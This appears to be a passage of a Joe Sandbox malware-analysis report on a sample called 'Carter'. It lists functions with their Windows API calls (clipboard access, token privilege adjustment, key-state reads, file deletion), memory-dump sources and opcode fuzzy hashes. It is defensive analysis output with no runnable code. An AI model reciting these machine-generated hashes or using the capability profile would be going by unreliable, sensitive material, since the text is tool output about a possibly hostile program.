                                                                            • Opcode ID: b4dda8de6e5f77235d07f0977d959be1c578a88ffbc74f31bad1eeb27e709010
                                                                            • Instruction ID: 402f66aacbbb912e4e48cb7e64dcf98133b1ee45565d3f5df911aa3d84643746
                                                                            • Opcode Fuzzy Hash: b4dda8de6e5f77235d07f0977d959be1c578a88ffbc74f31bad1eeb27e709010
                                                                            • Instruction Fuzzy Hash: 6BF08579162703CFCB38BF64E4A0816BBF0AF14325320892EE5D78B651C73299A0CF44
                                                                            Function 00284AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID:
                                                                            • API String ID: 2638373210-0
                                                                            • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                            • Instruction ID: 0f54bdf2af798fb2ec90c78f8bd344de01c283e793cd42f70e01f0d5c380ee66
                                                                            • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                            • Instruction Fuzzy Hash: 21F0587241020DFFDF05DF90C941EAABB79FF04314F208189F8188A212D332EA21AB90
                                                                            Function 002909C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002909E4
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LongNamePath_memmove
                                                                            • String ID:
                                                                            • API String ID: 2514874351-0
                                                                            • Opcode ID: 4eeb18644d5f13934f7d444ee887c447e6effb0ba1e23c0159068f8f2728e3d3
                                                                            • Instruction ID: 076cdfec999b4ac432c8bf0f9fe7385b64ac27607c7fb6ce1feaddf0e7dacd86
                                                                            • Opcode Fuzzy Hash: 4eeb18644d5f13934f7d444ee887c447e6effb0ba1e23c0159068f8f2728e3d3
                                                                            • Instruction Fuzzy Hash: 88E0863691112857C721A6989C16FEA77DDDF897A0F0401B6FC08D7244D9609CA18A91
                                                                            Function 002D4D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 002D4D31
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FolderPath_memmove
                                                                            • String ID:
                                                                            • API String ID: 3334745507-0
                                                                            • Opcode ID: fa94f4744c0b87cccc470c3655d2bc637ae6a38c6ca10d145c4066692f16db8b
                                                                            • Instruction ID: 6701b5999edf348c4b505649f7b59f0ddb4850d88e9db784abe81e25932a746d
                                                                            • Opcode Fuzzy Hash: fa94f4744c0b87cccc470c3655d2bc637ae6a38c6ca10d145c4066692f16db8b
                                                                            • Instruction Fuzzy Hash: 19D05EA591132C2BEB64E6A59C0EDB77BACD744220F0006A27C5CC3141E9249D558AE0
                                                                            Function 002D394D Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002D384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,002D3959,00000000,00000000,?,002C05DB,00328070,00000002,?,?), ref: 002D38CA
                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,002C05DB,00328070,00000002,?,?,?,00000000), ref: 002D3967
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: File$PointerWrite
                                                                            • String ID:
                                                                            • API String ID: 539440098-0
                                                                            • Opcode ID: c7de2b3bcad887645ce4386c16bce9d3249d409f0095d0860e19e9082ace3705
                                                                            • Instruction ID: 438fff65b77d9b39b6464c45ef5f69732fc1a339008563f87be5d087b661383d
                                                                            • Opcode Fuzzy Hash: c7de2b3bcad887645ce4386c16bce9d3249d409f0095d0860e19e9082ace3705
                                                                            • Instruction Fuzzy Hash: D5E04636410208BBDB20EF94D801B9ABBBDEB04320F00465BFD4092111DBB2AE24ABE1
                                                                            Function 002D3EF7 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,002D3E7D,?,?,?), ref: 002D3F0D
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CopyFile
                                                                            • String ID:
                                                                            • API String ID: 1304948518-0
                                                                            • Opcode ID: 62990fa24c3af6b906b1c1c2f3f10d0353c2d169d5ddce4a3ae94f07cdbbde12
                                                                            • Instruction ID: 851e32f01f6c3f09ec540fe29ae9abf933b4b7ddd820303364a127fdc14c1ffd
                                                                            • Opcode Fuzzy Hash: 62990fa24c3af6b906b1c1c2f3f10d0353c2d169d5ddce4a3ae94f07cdbbde12
                                                                            • Instruction Fuzzy Hash: A7D0A7315E020CBBEF50DFA4CC06FA8B7ACE711706F1002A4B504D90E0DA7269149795
                                                                            Function 002842AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,002C06E6,00000000,00000000,00000000), ref: 002842BF
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 24dc1951faae010bc44230bbff664216403b45301ff2da6cb13277f27f241087
                                                                            • Instruction ID: 67b759117ae5bdbb7e6afc2cc92f02f79f4cfbd6677ac11849d47373c46fc05b
                                                                            • Opcode Fuzzy Hash: 24dc1951faae010bc44230bbff664216403b45301ff2da6cb13277f27f241087
                                                                            • Instruction Fuzzy Hash: E8D0C77464020CBFE715CB80DC46FA9777CE705710F100195FD0466290D6B27D508795
                                                                            Function 002D4FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,002D3BFE), ref: 002D4FED
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: db41984d1112e6224b38485f13c8b3008429450a5bd541209d1ad946495edf0f
                                                                            • Instruction ID: 66fdc1fe424748780512325c1ad671e3170fa1e622794de4bf6429c5b4f3ab3c
                                                                            • Opcode Fuzzy Hash: db41984d1112e6224b38485f13c8b3008429450a5bd541209d1ad946495edf0f
                                                                            • Instruction Fuzzy Hash: 4FB092380216025B9D2C2F3C19581A9330558423A9BD81B83E47885AF296398C6FA520
                                                                            Function 0029547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __wfsopen
                                                                            • String ID:
                                                                            • API String ID: 197181222-0
                                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                            • Instruction ID: 6ca23f9bb5531627f2d88530d72eb08d11746b1c5a8fb1346a784bd25b1a399a
                                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                            • Instruction Fuzzy Hash: 3DB0927654020C77CE022E82EC03A593B29AB40A68F408020FB0C1C162A673A6B09A89
                                                                            Function 002DD6BE Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 002DD842
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1452528299-0
                                                                            • Opcode ID: 9a146891951c729c9dfcc814090b2e7b540ff9aa43a2f9bb4ab8f8cd0409eedf
                                                                            • Instruction ID: 9e002c5fc2f6877532301edcc58e6fc9f8cadc43e02fcdc577aee532aa0569c5
                                                                            • Opcode Fuzzy Hash: 9a146891951c729c9dfcc814090b2e7b540ff9aa43a2f9bb4ab8f8cd0409eedf
                                                                            • Instruction Fuzzy Hash: 5A7162342257028FC714EF64D491A6AB7E4AF88354F04466EF8969B3E2DB30ED25CF52
                                                                            Function 002DC270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002D4005: FindFirstFileW.KERNEL32(?,?), ref: 002D407C
                                                                              • Part of subcall function 002D4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 002D40CC
                                                                              • Part of subcall function 002D4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 002D40DD
                                                                              • Part of subcall function 002D4005: FindClose.KERNEL32(00000000), ref: 002D40F4
                                                                            • GetLastError.KERNEL32 ref: 002DC292
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                            • String ID:
                                                                            • API String ID: 2191629493-0
                                                                            • Opcode ID: c3588b6fd9dae52239412c987fb08edec8b1bea954fba45356491367715c03df
                                                                            • Instruction ID: f95f0b608857cd46e318cf79841fd91b1d0a316cf266da0943dfd1bc44b7733d
                                                                            • Opcode Fuzzy Hash: c3588b6fd9dae52239412c987fb08edec8b1bea954fba45356491367715c03df
                                                                            • Instruction Fuzzy Hash: D5F082352202108FCB15FF59D854B5AB7E5AF44320F05C05AF94997351CB70BC11CF94
                                                                            Function 002842CF Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(?,?,00000000,002B2F8B), ref: 002842EF
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 5f0b9ed91cf0bc4101d51549197d510ddc16adfa50801090ef8a7f3f8645bbad
                                                                            • Instruction ID: d2ca10955e315e997bd3ba784e5f4e54887f71aa816d98971bebef4d80183078
                                                                            • Opcode Fuzzy Hash: 5f0b9ed91cf0bc4101d51549197d510ddc16adfa50801090ef8a7f3f8645bbad
                                                                            • Instruction Fuzzy Hash: 9AE09A79415702CFC3326F1AD404411F7E4FFD13613214A2FE4E6925A4D7B054958B50

                                                                            Non-executed Functions

                                                                            Function 002FD164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 002FD208
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002FD249
                                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 002FD28E
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002FD2B8
                                                                            • SendMessageW.USER32 ref: 002FD2E1
                                                                            • _wcsncpy.LIBCMT ref: 002FD359
                                                                            • GetKeyState.USER32(00000011), ref: 002FD37A
                                                                            • GetKeyState.USER32(00000009), ref: 002FD387
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002FD39D
                                                                            • GetKeyState.USER32(00000010), ref: 002FD3A7
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002FD3D0
                                                                            • SendMessageW.USER32 ref: 002FD3F7
                                                                            • SendMessageW.USER32(?,00001030,?,002FB9BA), ref: 002FD4FD
                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 002FD513
                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002FD526
                                                                            • SetCapture.USER32(?), ref: 002FD52F
                                                                            • ClientToScreen.USER32(?,?), ref: 002FD594
                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002FD5A1
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002FD5BB
                                                                            • ReleaseCapture.USER32 ref: 002FD5C6
                                                                            • GetCursorPos.USER32(?), ref: 002FD600
                                                                            • ScreenToClient.USER32(?,?), ref: 002FD60D
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 002FD669
                                                                            • SendMessageW.USER32 ref: 002FD697
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 002FD6D4
                                                                            • SendMessageW.USER32 ref: 002FD703
                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002FD724
                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 002FD733
                                                                            • GetCursorPos.USER32(?), ref: 002FD753
                                                                            • ScreenToClient.USER32(?,?), ref: 002FD760
                                                                            • GetParent.USER32(?), ref: 002FD780
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 002FD7E9
                                                                            • SendMessageW.USER32 ref: 002FD81A
                                                                            • ClientToScreen.USER32(?,?), ref: 002FD878
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002FD8A8
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 002FD8D2
                                                                            • SendMessageW.USER32 ref: 002FD8F5
                                                                            • ClientToScreen.USER32(?,?), ref: 002FD947
                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002FD97B
                                                                              • Part of subcall function 002729AB: GetWindowLongW.USER32(?,000000EB), ref: 002729BC
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002FDA17
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                            • String ID: @GUI_DRAGID$F
                                                                            • API String ID: 3977979337-4164748364
                                                                            • Opcode ID: 93e209f745987a38b2e4177142559d9ed5a31233525b97f962878714411e1e50
                                                                            • Instruction ID: 928d59ce5f80a3d58c6ba5b19fbae1e52770770f5f8e8aaa88fb7cc16ade0db6
                                                                            • Opcode Fuzzy Hash: 93e209f745987a38b2e4177142559d9ed5a31233525b97f962878714411e1e50
                                                                            • Instruction Fuzzy Hash: 4742D07021834A9FD725DF24C888B7ABBEAFF49390F140629F699872A1C771D864CF51
                                                                            Function 002C8F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C93E3
                                                                              • Part of subcall function 002C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C9410
                                                                              • Part of subcall function 002C9399: GetLastError.KERNEL32 ref: 002C941D
                                                                            • _memset.LIBCMT ref: 002C8F71
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002C8FC3
                                                                            • CloseHandle.KERNEL32(?), ref: 002C8FD4
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002C8FEB
                                                                            • GetProcessWindowStation.USER32 ref: 002C9004
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 002C900E
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002C9028
                                                                              • Part of subcall function 002C8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002C8F27), ref: 002C8DFE
                                                                              • Part of subcall function 002C8DE9: CloseHandle.KERNEL32(?,?,002C8F27), ref: 002C8E10
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                            • String ID: $default$winsta0
                                                                            • API String ID: 2063423040-1027155976
                                                                            • Opcode ID: 688b6544a48bbaa4f3f90ef543bdacbf70f808e240eb76845669d68c1ac05e0e
                                                                            • Instruction ID: 81ba3cbeb5d3842dcc27bd3375af06396ec5aea650aba487605ac623f3631f1b
                                                                            • Opcode Fuzzy Hash: 688b6544a48bbaa4f3f90ef543bdacbf70f808e240eb76845669d68c1ac05e0e
                                                                            • Instruction Fuzzy Hash: ED816B7192120ABFDF129FA4CC49FEE7B79EF04304F084259F914A2260DB728A65DF50
                                                                            Function 002E4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenClipboard.USER32(00300980), ref: 002E465C
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 002E466A
                                                                            • GetClipboardData.USER32(0000000D), ref: 002E4672
                                                                            • CloseClipboard.USER32 ref: 002E467E
                                                                            • GlobalLock.KERNEL32(00000000), ref: 002E469A
                                                                            • CloseClipboard.USER32 ref: 002E46A4
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 002E46B9
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 002E46C6
                                                                            • GetClipboardData.USER32(00000001), ref: 002E46CE
                                                                            • GlobalLock.KERNEL32(00000000), ref: 002E46DB
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 002E470F
                                                                            • CloseClipboard.USER32 ref: 002E481F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                            • String ID:
                                                                            • API String ID: 3222323430-0
                                                                            • Opcode ID: 8560173accba91e47d8d9a300b64c01f03b8d00e6df2c3931c228d82a6c5dc3c
                                                                            • Instruction ID: 74af3c790664fc6f7323cfec7f7bee92749aa6fc3db036521a1a29afd856a4d3
                                                                            • Opcode Fuzzy Hash: 8560173accba91e47d8d9a300b64c01f03b8d00e6df2c3931c228d82a6c5dc3c
                                                                            • Instruction Fuzzy Hash: CB51D0312A5286ABD305FF21DC99F6E73ACAF84B00F40052AF55AD21E1DF70D8258F62
